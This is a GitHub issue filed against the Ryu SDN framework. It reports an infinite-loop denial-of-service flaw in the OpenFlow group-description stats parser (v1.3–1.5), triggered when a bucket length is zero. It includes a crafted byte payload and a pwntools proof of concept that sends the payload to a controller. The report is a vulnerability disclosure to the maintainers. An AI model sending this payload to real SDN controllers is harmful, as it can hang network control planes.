search

faucetsdn / ryu

Ryu component-based software defined networking framework
https://ryu-sdn.org
Apache License 2.0
1.51k stars 1.16k forks source link

Suggestion for OFPGroupDescStats parser will cause an infinite loop #193

Open ErodedElk opened 6 months ago

ErodedElk commented 6 months ago

in /ryu/ofproto/ofproto_v1_3_parser.py about line=4685

class OFPGroupDescStats(StringifyMixin):
    @classmethod
    def parser(cls, buf, offset):
    ....
        while length < stats.length:
            bucket = OFPBucket.parser(buf, offset)
            stats.buckets.append(bucket)

            offset += bucket.len
            length += bucket.len

If OFPBucket.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop.

payload:

brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)

poc:

from pwn import *
p=remote("0.0.0.0",6633)
brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)
p.send(brk)
p.interactive()

This POC uses OFPGroupDescStatsReply as an example. The OFPGroupDescStatsReply message will be accompanied by an OFPGroupDescStats structure, in which the length of OFPBucket is tampered with to 0.

ErodedElk commented 6 months ago

This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=4685 /ryu/ofproto/ofproto_v1_4_parser.py about line=2548 /ryu/ofproto/ofproto_v1_5_parser.py about line=5893